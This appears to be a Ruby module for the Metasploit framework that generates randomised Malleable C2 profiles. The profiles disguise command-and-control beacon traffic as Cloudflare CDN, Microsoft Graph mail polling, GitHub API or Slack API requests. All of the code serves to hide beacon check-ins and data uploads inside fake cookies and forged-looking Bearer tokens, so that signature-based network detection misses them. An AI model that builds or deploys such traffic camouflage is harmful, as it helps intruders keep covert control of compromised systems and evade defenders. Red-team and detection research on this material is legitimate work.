# -*- coding: binary -*-
##
# Generates randomised Malleable C2 HTTP profiles (.profile format compatible
# with the existing Msf::Payload::MalleableC2 parser and MALLEABLEC2 handler
# option).
#
# Each persona produces per-engagement-unique GET/POST traffic that blends
# into a specific application category, defeating signature-based NDR rules
# that rely on fixed URI paths, header sets, or User-Agent strings.
#
# Usage:
#   profile = Rex::Proto::Http::C2ProfileGenerator.generate(persona: :office365)
#   File.write('engagement.profile', profile)
#   # then: set MALLEABLEC2 /path/to/engagement.profile
#
# Personas:
#   :cdn       - Cloudflare CDN asset + RUM beacon traffic
#   :office365 - Microsoft Graph API (email/calendar polling)
#   :github    - GitHub REST API (repo activity)
#   :slack     - Slack Web API (channel history + chat)
##

module Rex
  module Proto
    module Http
      module C2ProfileGenerator

        PERSONAS = %i[cdn office365 github slack].freeze

        # Generate a complete profile string for the given persona.
        #
        # @param persona   [Symbol]  one of PERSONAS
        # @param sleeptime [Integer] beacon interval in milliseconds
        # @param jitter    [Integer] percentage jitter applied to sleeptime (0-99)
        # @return [String] profile file content ready to write to disk
        def self.generate(persona: :cdn, sleeptime: 5000, jitter: 20)
          raise ArgumentError, "Unknown persona #{persona}. Valid: #{PERSONAS.join(', ')}" unless PERSONAS.include?(persona)

          builder = case persona
                    when :cdn       then Persona::CDN.new
                    when :office365 then Persona::Office365.new
                    when :github    then Persona::GitHub.new
                    when :slack     then Persona::Slack.new
                    end

          builder.build(sleeptime: sleeptime, jitter: jitter)
        end

        # ------------------------------------------------------------------ #
        # Internal helpers
        # ------------------------------------------------------------------ #

        module Helpers
          def rand_hex(len)
            Rex::Text.rand_text_hex(len)
          end

          def rand_alnum(len)
            Rex::Text.rand_text_alphanumeric(len)
          end

          def rand_guid
            [rand_hex(8), rand_hex(4), rand_hex(4), rand_hex(4), rand_hex(12)].join('-')
          end

          # Random word from a curated list — looks human-chosen, not generated.
          def rand_word(list)
            list.sample
          end

          def escape(s)
            # Escape double-quotes and backslashes for the profile string format.
            s.gsub('\\', '\\\\\\\\').gsub('"', '\\"')
          end

          def set_line(key, value)
            %Q(set #{key} "#{escape(value)}";)
          end

          def header_line(name, value, indent = '        ')
            %Q(#{indent}header "#{escape(name)}" "#{escape(value)}";)
          end
        end

        # ------------------------------------------------------------------ #
        # Profile builder base
        # ------------------------------------------------------------------ #

        class ProfileBuilder
          include Helpers

          # Subclasses implement these three methods:
          def useragent;  raise NotImplementedError; end
          def server_name; raise NotImplementedError; end
          def decoy_body;  raise NotImplementedError; end
          def http_get_block; raise NotImplementedError; end
          def http_post_block; raise NotImplementedError; end

          def build(sleeptime:, jitter:)
            lines = []
            lines << "# #{self.class.name.split('::').last} persona — generated by Rex::Proto::Http::C2ProfileGenerator"
            lines << "# Operator notes:"
            lines << "#   HttpServerName  => #{server_name}"
            lines << "#   HttpUnknownRequestResponse => see decoy_body below"
            lines << "#   HttpUserAgent   => (set automatically by profile useragent directive)"
            lines << "#"
            lines << "# Decoy body for non-payload requests:"
            decoy_body.each_line { |l| lines << "#   #{l.chomp}" }
            lines << ''
            lines << set_line('useragent', useragent)
            lines << set_line('sleeptime', sleeptime.to_s)
            lines << set_line('jitter', jitter.to_s)
            lines << ''
            lines << http_get_block
            lines << ''
            lines << http_post_block
            lines << ''
            lines.join("\n")
          end
        end

        # ------------------------------------------------------------------ #
        # CDN persona
        # Mimics Cloudflare CDN static-asset delivery + Real User Monitoring
        # beacon calls. Session UUID hidden in __cf_bm cookie (identical in
        # format to Cloudflare's Bot Management cookie).
        # ------------------------------------------------------------------ #
        module Persona
          class CDN < ProfileBuilder
            DOMAINS = %w[
              acmecorp.io globaltech.net fastcdn.cloud assets.shopflow.com
              static.mediaverse.io cdn.nexuspay.app resources.streamhub.tv
            ].freeze

            ASSET_EXTS = %w[js css woff2 svg].freeze
            CF_DATACENTERS = %w[AMS LHR CDG FRA SFO DFW IAD SIN NRT].freeze

            def initialize
              @domain     = rand_word(DOMAINS)
              @asset_hash = rand_hex(8)
              @asset_ext  = rand_word(ASSET_EXTS)
              @cf_ray     = "#{rand_hex(16)}-#{rand_word(CF_DATACENTERS)}"
              @rum_token  = rand_alnum(32)
            end

            def useragent
              Rex::UserAgent::COMMON_AGENTS.sample
            end

            def server_name
              'cloudflare'
            end

            def decoy_body
              '{"success":true}'
            end

            def http_get_block
              <<~PROFILE
                http-get {
                    set uri "/static/assets/app.#{@asset_hash}.#{@asset_ext}";

                    client {
                        header "Accept" "*/*";
                        header "Referer" "https://#{@domain}/";
                        header "Cache-Control" "no-cache";
                        header "Pragma" "no-cache";

                        metadata {
                            base64url;
                            prepend "__cf_bm=";
                            header "Cookie";
                        }
                    }

                    server {
                        header "Content-Type" "application/#{@asset_ext == 'js' ? 'javascript' : 'octet-stream'}; charset=utf-8";
                        header "Cache-Control" "public, max-age=31536000, immutable";
                        header "CF-Cache-Status" "HIT";
                        header "CF-Ray" "#{@cf_ray}";
                        header "Server" "cloudflare";
                        header "Vary" "Accept-Encoding";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end

            def http_post_block
              <<~PROFILE
                http-post {
                    set uri "/cdn-cgi/rum";

                    client {
                        header "Content-Type" "application/x-www-form-urlencoded";
                        header "Origin" "https://#{@domain}";
                        header "Referer" "https://#{@domain}/";

                        id {
                            base64url;
                            prepend "__cf_bm=";
                            header "Cookie";
                        }

                        output {
                            base64url;
                        }
                    }

                    server {
                        header "Content-Type" "application/json; charset=utf-8";
                        header "CF-Ray" "#{@cf_ray}";
                        header "Server" "cloudflare";
                        header "Cache-Control" "no-store";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end
          end

          # ---------------------------------------------------------------- #
          # Office 365 / Microsoft Graph API persona
          # GET mimics Graph API mailbox polling; POST mimics message send.
          # Bearer token in Authorization header is indistinguishable from a
          # real Azure AD access token.
          # ---------------------------------------------------------------- #
          class Office365 < ProfileBuilder
            FOLDERS = %w[Inbox Drafts Archive SentItems].freeze
            GRAPH_VERSIONS = %w[v1.0 beta].freeze
            SDK_VERSIONS = %w[graph-python/1.5.0 graph-js/3.0.17 graph-dotnet/5.56.0].freeze

            def initialize
              @folder          = rand_word(FOLDERS)
              @graph_ver       = rand_word(GRAPH_VERSIONS)
              @client_req_id   = rand_guid
              @req_id          = rand_guid
              @msg_id          = rand_alnum(32)
              @sdk             = rand_word(SDK_VERSIONS)
            end

            def useragent
              # Edge is the primary O365 desktop client UA
              Rex::UserAgent::COMMON_AGENTS.find { |ua| ua.include?('Edg/') } ||
                Rex::UserAgent::COMMON_AGENTS.first
            end

            def server_name
              'Microsoft-IIS/10.0'
            end

            def decoy_body
              '{"@odata.context":"https://graph.microsoft.com/v1.0/$metadata#users/me/messages","value":[]}'
            end

            def http_get_block
              <<~PROFILE
                http-get {
                    set uri "/#{@graph_ver}/me/mailFolders/#{@folder}/messages";

                    client {
                        header "Accept" "application/json";
                        header "SdkVersion" "#{@sdk}";
                        header "client-request-id" "#{@client_req_id}";
                        header "Return-Client-Request-Id" "true";

                        metadata {
                            base64url;
                            prepend "Bearer ";
                            header "Authorization";
                        }
                    }

                    server {
                        header "Content-Type" "application/json;odata.metadata=minimal;charset=utf-8";
                        header "Cache-Control" "private";
                        header "Server" "Microsoft-IIS/10.0";
                        header "X-Powered-By" "ASP.NET";
                        header "request-id" "#{@req_id}";
                        header "client-request-id" "#{@client_req_id}";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end

            def http_post_block
              <<~PROFILE
                http-post {
                    set uri "/#{@graph_ver}/me/messages/AAMkAG#{@msg_id}/send";

                    client {
                        header "Content-Type" "application/json";
                        header "Accept" "application/json";
                        header "client-request-id" "#{@client_req_id}";

                        id {
                            base64url;
                            prepend "Bearer ";
                            header "Authorization";
                        }

                        output {
                            base64url;
                        }
                    }

                    server {
                        header "Content-Type" "application/json";
                        header "Server" "Microsoft-IIS/10.0";
                        header "X-Powered-By" "ASP.NET";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end
          end

          # ---------------------------------------------------------------- #
          # GitHub REST API persona
          # GET mimics commit/event polling; POST mimics issue comment creation.
          # Bearer token in Authorization mirrors the github token pattern.
          # ---------------------------------------------------------------- #
          class GitHub < ProfileBuilder
            OWNERS = %w[
              acme-corp cloudnative-io infraops devteam-eu platform-sre
              security-eng data-platform mobile-squad backend-guild
            ].freeze

            REPOS = %w[
              api-gateway config-service event-bus auth-service
              data-pipeline monitoring telemetry ci-tools deploy-bot
            ].freeze

            API_VERSIONS = ['2022-11-28'].freeze

            def initialize
              @owner   = rand_word(OWNERS)
              @repo    = rand_word(REPOS)
              @api_ver = rand_word(API_VERSIONS)
              @req_id  = rand_guid
              @issue   = rand(1..500)
            end

            def useragent
              "git/2.#{rand(40..50)}.0"
            end

            def server_name
              'GitHub.com'
            end

            def decoy_body
              '[]'
            end

            def http_get_block
              <<~PROFILE
                http-get {
                    set uri "/repos/#{@owner}/#{@repo}/commits";

                    client {
                        header "Accept" "application/vnd.github.v3+json";
                        header "X-GitHub-Api-Version" "#{@api_ver}";

                        metadata {
                            base64url;
                            prepend "Bearer ";
                            header "Authorization";
                        }
                    }

                    server {
                        header "Content-Type" "application/json; charset=utf-8";
                        header "Cache-Control" "private, max-age=60, s-maxage=60";
                        header "Server" "GitHub.com";
                        header "X-GitHub-Request-Id" "#{@req_id}";
                        header "X-RateLimit-Limit" "5000";
                        header "X-RateLimit-Remaining" "#{rand(1000..4999)}";
                        header "X-Content-Type-Options" "nosniff";
                        header "Vary" "Accept, Authorization";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end

            def http_post_block
              <<~PROFILE
                http-post {
                    set uri "/repos/#{@owner}/#{@repo}/issues/#{@issue}/comments";

                    client {
                        header "Content-Type" "application/json";
                        header "Accept" "application/vnd.github.v3+json";
                        header "X-GitHub-Api-Version" "#{@api_ver}";

                        id {
                            base64url;
                            prepend "Bearer ";
                            header "Authorization";
                        }

                        output {
                            base64url;
                        }
                    }

                    server {
                        header "Content-Type" "application/json; charset=utf-8";
                        header "Server" "GitHub.com";
                        header "X-GitHub-Request-Id" "#{@req_id}";
                        header "X-RateLimit-Limit" "5000";
                        header "X-Content-Type-Options" "nosniff";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end
          end

          # ---------------------------------------------------------------- #
          # Slack Web API persona
          # GET mimics conversations.history channel polling; POST mimics
          # chat.postMessage. Token in Authorization header matches the
          # xoxb- bot token format that Slack clients use.
          # ---------------------------------------------------------------- #
          class Slack < ProfileBuilder
            CHANNEL_PREFIXES = %w[C D G].freeze  # public, DM, private channel IDs

            def initialize
              @channel   = "#{rand_word(CHANNEL_PREFIXES)}#{rand_alnum(8).upcase}"
              @team_id   = "T#{rand_alnum(8).upcase}"
              @token_pfx = "xoxb-#{rand(100_000..999_999)}-#{rand(100_000_000_000..999_999_999_999)}"
            end

            def useragent
              # Slack desktop app UA on Windows
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " \
                "(KHTML, like Gecko) Slack/4.#{rand(30..40)}.#{rand(0..9)} " \
                "Chrome/#{rand(110..120)}.0.0.0 Electron/#{rand(20..25)}.0.0 Safari/537.36"
            end

            def server_name
              'Apache'
            end

            def decoy_body
              '{"ok":true,"messages":[],"has_more":false}'
            end

            def http_get_block
              <<~PROFILE
                http-get {
                    set uri "/api/conversations.history";

                    client {
                        header "Accept" "application/json";
                        header "Accept-Language" "en-US,en;q=0.9";

                        metadata {
                            base64url;
                            prepend "#{@token_pfx}-";
                            prepend "Bearer xoxb-";
                            header "Authorization";
                        }
                    }

                    server {
                        header "Content-Type" "application/json; charset=utf-8";
                        header "Cache-Control" "no-cache,no-store";
                        header "Server" "Apache";
                        header "X-XSS-Protection" "0";
                        header "X-Content-Type-Options" "nosniff";
                        header "Vary" "Accept-Encoding";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end

            def http_post_block
              <<~PROFILE
                http-post {
                    set uri "/api/chat.postMessage";

                    client {
                        header "Content-Type" "application/json; charset=utf-8";
                        header "Accept" "application/json";

                        id {
                            base64url;
                            prepend "#{@token_pfx}-";
                            prepend "Bearer xoxb-";
                            header "Authorization";
                        }

                        output {
                            base64url;
                        }
                    }

                    server {
                        header "Content-Type" "application/json; charset=utf-8";
                        header "Server" "Apache";
                        header "Cache-Control" "no-cache,no-store";

                        output {
                            print;
                        }
                    }
                }
              PROFILE
            end
          end
        end

      end
    end
  end
end
